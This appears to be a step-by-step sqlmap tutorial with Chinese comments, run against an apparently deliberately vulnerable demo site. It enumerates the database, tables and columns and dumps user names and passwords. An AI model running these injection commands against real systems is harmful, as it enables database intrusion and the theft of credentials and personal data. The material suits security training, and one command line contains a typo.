http://testphp.vulnweb.com/artists.php?artist=1 #库
注意:--前面有一个空格
C:\Python27\sqlmap>sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1
" --current-db
current database: ‘acuart‘
################################################### #用户
C:\Python27\sqlmap>sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1
" --current-user
current user: ‘acuart@localhost‘
###################################################
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --tables -D "acuart" #列 表名
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
###################################################
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --columns -T "users" users-D "acuart" -v 0 #列 字段
注意:-v后面有一个0
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+
###################################################
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -C "name" -T "users" -D "acuart" -v 0 #获取字段内容
---
web application technology: Nginx, PHP 5.
back-end DBMS: MySQL 5.0.11
Database: acuart
Table: users
[1 entry]
+------------+
| name |
+------------+
| John Smith |
+------------+
[*] shutting down at 20:32:30
###################################################
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -C "pass" -T "users" -D "acuart" -v 0 #获取字段内容
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
Database: acuart
Table: users
[1 entry]
+------+
| pass |
+------+
| test |
+------+
###################################################
sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --dump -C "uname" -T "users" -D "acuart" -v 0 #获取字段内容
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
Database: acuart
Table: users
[1 entry]
+-------+
| uname |
+-------+
| test |
+-------+
###################################################